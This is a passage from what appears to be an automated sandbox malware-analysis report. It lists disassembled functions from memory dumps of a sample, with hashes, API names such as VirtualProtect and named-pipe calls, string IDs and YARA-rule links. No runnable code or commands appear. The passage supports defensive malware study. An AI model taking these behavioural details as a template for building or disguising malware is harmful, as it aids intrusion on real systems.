                                                                                                                                                                                            • API String ID: 206529840-3597996958
                                                                                                                                                                                            • Opcode ID: 3bea11effd991dbff14e9cac326ad14e13f08ea6a192f866530905ee3f90829b
                                                                                                                                                                                            • Instruction ID: a674461e3bd1dd0103c88dac857a7905e4203404c2dede95473422d599b8d874
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bea11effd991dbff14e9cac326ad14e13f08ea6a192f866530905ee3f90829b
                                                                                                                                                                                            • Instruction Fuzzy Hash: DE31EE21A0D64296EB24EB21DC742AAA3A1FB88744FA44435D92D836D9DF3CD50587A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE544C1C Relevance: 1.5, APIs: 1, Instructions: 25encryptionCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ContextCryptCurrentErrorLastReleaseThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 354363194-0
                                                                                                                                                                                            • Opcode ID: f96434bf9168117ebdff4348d076706bb195abfcd39e56e47b0d15c387efc6d9
                                                                                                                                                                                            • Instruction ID: bd41ee82ae4e218e42d4eb940e377703ccb196d21ac04d47c548fca4afa040c9
                                                                                                                                                                                            • Opcode Fuzzy Hash: f96434bf9168117ebdff4348d076706bb195abfcd39e56e47b0d15c387efc6d9
                                                                                                                                                                                            • Instruction Fuzzy Hash: EBF03A14B5D50385FB91BBA0ACB17B5A290AFD0304FB44434D93D831DAEF2CA58893B0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE541AD0 Relevance: 31.8, APIs: 21, Instructions: 260sleepCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$BreakDebugErrorLastOverlappedResultSleepmemcpy
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1079923647-0
                                                                                                                                                                                            • Opcode ID: 0fc648becfba580e308f7de3fecf7bec5cc65c61210f2d3db28dff69f106d86f
                                                                                                                                                                                            • Instruction ID: bbdb0e48ad7d2767f0ceeeb4fe6b1a73a0c49cb3d86b6db0cfe88c066ae40d2c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fc648becfba580e308f7de3fecf7bec5cc65c61210f2d3db28dff69f106d86f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 25B1B262A0C60282EF64BB259E301B9A7A1FFC4754FB40536DE2E076C5DF3CE85187A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE54548C Relevance: 24.1, APIs: 16, Instructions: 92COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_imagememset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__p___argc__p___wargv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt_cexit_get_initial_wide_environment_initterm_e_register_thread_local_exe_atexit_callbackexit
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 557578165-0
                                                                                                                                                                                            • Opcode ID: ab3496d642dff016e7cccd1215e6a449bc999fd02752677a9af6862feb6ebb7f
                                                                                                                                                                                            • Instruction ID: 9386c649e6a6a32d450d60a3d100935cd5610b73b20d9c05f402d414481e0053
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab3496d642dff016e7cccd1215e6a449bc999fd02752677a9af6862feb6ebb7f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F310721A0D24382FB15BB25AC753B9A391AFD5784FF44434EA2E0B6D7DE6DE40487A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE5412F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63libraryfileloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Handle$AddressCloseCreateErrorFileLastModuleProcmemset
                                                                                                                                                                                            • String ID: GetCachePath$fusion.dll
                                                                                                                                                                                            • API String ID: 3009750605-903800405
                                                                                                                                                                                            • Opcode ID: c91b2d206778f32f6fc935ab3af68e62905bf3e8b358357ecffa313f68f8e6e6
                                                                                                                                                                                            • Instruction ID: a28453b298e187f8b80a2d9e31e23a5a57044285a1182c6a96f403798e0b2bcf
                                                                                                                                                                                            • Opcode Fuzzy Hash: c91b2d206778f32f6fc935ab3af68e62905bf3e8b358357ecffa313f68f8e6e6
                                                                                                                                                                                            • Instruction Fuzzy Hash: AF21716160D74282EB60EB54E8B43AAB3A0EFC4794FA04135DA6D03BD5DF7CD448C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE5427E0 Relevance: 9.1, APIs: 6, Instructions: 133stringfilepipeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: lstrlen$CreateCriticalFileHandleHeapInitializeNamedPipeSectionState_itow_s
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1990252264-0
                                                                                                                                                                                            • Opcode ID: d0a2829fda362376c154a0a54d8ca2ba30c2425220e3a784794c5b89c968d7cd
                                                                                                                                                                                            • Instruction ID: e1d35fc9779a0aa0dfb0e271579f0012c41c13674ec2c71ec4624e501609a755
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0a2829fda362376c154a0a54d8ca2ba30c2425220e3a784794c5b89c968d7cd
                                                                                                                                                                                            • Instruction Fuzzy Hash: DB511536A0C65282EB20AF51E8B4779B360FFC4760FA04635CA6D47AC4DF7DE44587A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE54169C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                            • String ID: Software\Microsoft\ASP.NET$UseWorkerThreadsOnIIS5
                                                                                                                                                                                            • API String ID: 3677997916-4140686696
                                                                                                                                                                                            • Opcode ID: 19b0c655645e88b85057df6b0911e7094ca38a925f48dcd83b1ec3ba65a6f77e
                                                                                                                                                                                            • Instruction ID: 170774733a036a5c4d53bc847c94378375a5e29811814f77cca0be8ea3e562e6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 19b0c655645e88b85057df6b0911e7094ca38a925f48dcd83b1ec3ba65a6f77e
                                                                                                                                                                                            • Instruction Fuzzy Hash: BC113036A19B01CEEB219F20E8647A477A4FB8479CF900635E66C47A98DF3CD254CB94
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE5440B0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 88stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: memcpy$strcmp
                                                                                                                                                                                            • String ID: APPL_MD_PATH$APPL_PHYSICAL_PATH
                                                                                                                                                                                            • API String ID: 2777782223-1639331726
                                                                                                                                                                                            • Opcode ID: 529865da8bd7868b58bec6c1998783bd5b20ddbfae4be258b4af9b34c4f8e591
                                                                                                                                                                                            • Instruction ID: a1808f7b6d0abe9a70965b460c45abb437514fb76f9543cc5300a1853dd8fd4a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 529865da8bd7868b58bec6c1998783bd5b20ddbfae4be258b4af9b34c4f8e591
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9231F9A1B0C38385FB78AB198C702B8A391AFD5BC5FA45031CA6D877CADE3CE5418350
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE5423EC Relevance: 6.1, APIs: 4, Instructions: 88fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalFileSectionTime$EnterErrorLastLeaveReadSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3549092184-0
                                                                                                                                                                                            • Opcode ID: 2f5b29ceac32f6b0f2209fb83a5128f35916583dd9ff2f2b4eb4ca1aa8e90fcb
                                                                                                                                                                                            • Instruction ID: 1ab7673cf2c17cc74a6ae65e40a2c5616ad420b527ca8b8723278ac470a8b0de
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f5b29ceac32f6b0f2209fb83a5128f35916583dd9ff2f2b4eb4ca1aa8e90fcb
                                                                                                                                                                                            • Instruction Fuzzy Hash: D6316D35A0C65AC6EB20AB16E970239B360EBC4B90FA44535CB6E43BD5DF3DE4418790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE5419AC Relevance: 6.1, APIs: 4, Instructions: 76fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalSection$EnterErrorFileLastLeaveWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1726892732-0
                                                                                                                                                                                            • Opcode ID: 05abcd5a71e36f057d09ec2d575ec0ec8fb3a2c532764fa13fe86f660c1f5831
                                                                                                                                                                                            • Instruction ID: 08b5786d15ecc5b087dcca811ef990fb2ac382dadff0dfcf974f43e7c1609abf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 05abcd5a71e36f057d09ec2d575ec0ec8fb3a2c532764fa13fe86f660c1f5831
                                                                                                                                                                                            • Instruction Fuzzy Hash: E8316132A0CA5286EB10AF16DD70178B761FB84BA4FA84532DA2D437D5CF38D85587D4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE542D80 Relevance: 6.0, APIs: 4, Instructions: 29sleepthreadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Sleep$DisposeDomainsDrainIndirectPoolThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 33770825-0
                                                                                                                                                                                            • Opcode ID: 01b5d432c79148c5d4f289e515f93012e795df75cbfd57b637bc0877275bec7b
                                                                                                                                                                                            • Instruction ID: 9e6ec161c9b1f5176b2a1c622e8d2771c7f3ed109094d0dba0473a6ce234ee93
                                                                                                                                                                                            • Opcode Fuzzy Hash: 01b5d432c79148c5d4f289e515f93012e795df75cbfd57b637bc0877275bec7b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F0BD68E1C21646F75A77B45CB627891659FC0309FB01438C13F861D3DE6E649587B0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE542F90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentEventProcess
                                                                                                                                                                                            • String ID: %d^0x%08x
                                                                                                                                                                                            • API String ID: 1557529872-1044036643
                                                                                                                                                                                            • Opcode ID: ea44bb03caae7e33733096d14cea265961cb4ae19632cb0ee420556d41073ca5
                                                                                                                                                                                            • Instruction ID: 162189c82ee4cdde7630f9472e11b3c74c24b66d264ecd68447373bc1a3a51dd
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea44bb03caae7e33733096d14cea265961cb4ae19632cb0ee420556d41073ca5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 11018062E4C20386F76B25282D7A0398868FBC6304FF51235C87F176E4DC4FAA4093A1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:20.5%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                            Total number of Nodes:3
                                                                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                                                                            execution_graph 14170 7ffaac254e49 14171 7ffaac254e57 VirtualProtect 14170->14171 14173 7ffaac254f1e 14171->14173

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 00007FFAAC3913E9 Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000014.00000002.2517367011.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_20_2_7ffaac390000_ohvrxt.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: )Y
                                                                                                                                                                                            • API String ID: 0-3151686404
                                                                                                                                                                                            • Opcode ID: e0930e8bf056f85e0f749f22a4467c8d86129509d46c0d6bf0920f063c45580d
                                                                                                                                                                                            • Instruction ID: 4358fe50b7a0329af57b6bd9072078aa475d6a91586fd14ffcb54a5bf33c6c46
                                                                                                                                                                                            • Opcode Fuzzy Hash: e0930e8bf056f85e0f749f22a4467c8d86129509d46c0d6bf0920f063c45580d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 64D1387290EB858FE755DB3888659A4BFE0EF56300F0941FBD18DC71A3D929E849C392
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC254E49 Relevance: 1.6, APIs: 1, Instructions: 134memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 663 7ffaac254e49-7ffaac254e55 664 7ffaac254e57 663->664 665 7ffaac254e59-7ffaac254e69 663->665 664->665 668 7ffaac254e99-7ffaac254f1c VirtualProtect 664->668 666 7ffaac254e6b-7ffaac254e96 665->666 667 7ffaac254e98 665->667 666->667 667->668 673 7ffaac254f1e 668->673 674 7ffaac254f24-7ffaac254f55 668->674 673->674
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000014.00000002.2507425353.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_20_2_7ffaac250000_ohvrxt.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                            • Opcode ID: 9d0f6f1323664ce45f72a07d37e3ff9aecff65f8102ad4217b1316222998f05f
                                                                                                                                                                                            • Instruction ID: ec16144544fdf8a69d98930f970f97c33af6fb8ddcf63f6eb52c8d90b75dcfa6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d0f6f1323664ce45f72a07d37e3ff9aecff65f8102ad4217b1316222998f05f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A31D671D0CB4C8FDB18AB6D98066FE7BE1EB95711F00826FE049D3256DE74A80987C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC39082B Relevance: 1.0, Instructions: 1013COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000014.00000002.2517367011.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_20_2_7ffaac390000_ohvrxt.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 465812681717f8ed409a0e9b505fc92099dbe1ae4b1405d92da2d87b59e6c8fe
                                                                                                                                                                                            • Instruction ID: 56062f8f3c494e0efd3904665c968cb5e96e86c23528b47b16d9e6cab8d3e3f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 465812681717f8ed409a0e9b505fc92099dbe1ae4b1405d92da2d87b59e6c8fe
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C62087180EB868FF755DB6888659A4BFE0FF56300F0441FED08DDB192DA29A84AC7D1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC3921F0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000014.00000002.2517367011.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_20_2_7ffaac390000_ohvrxt.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
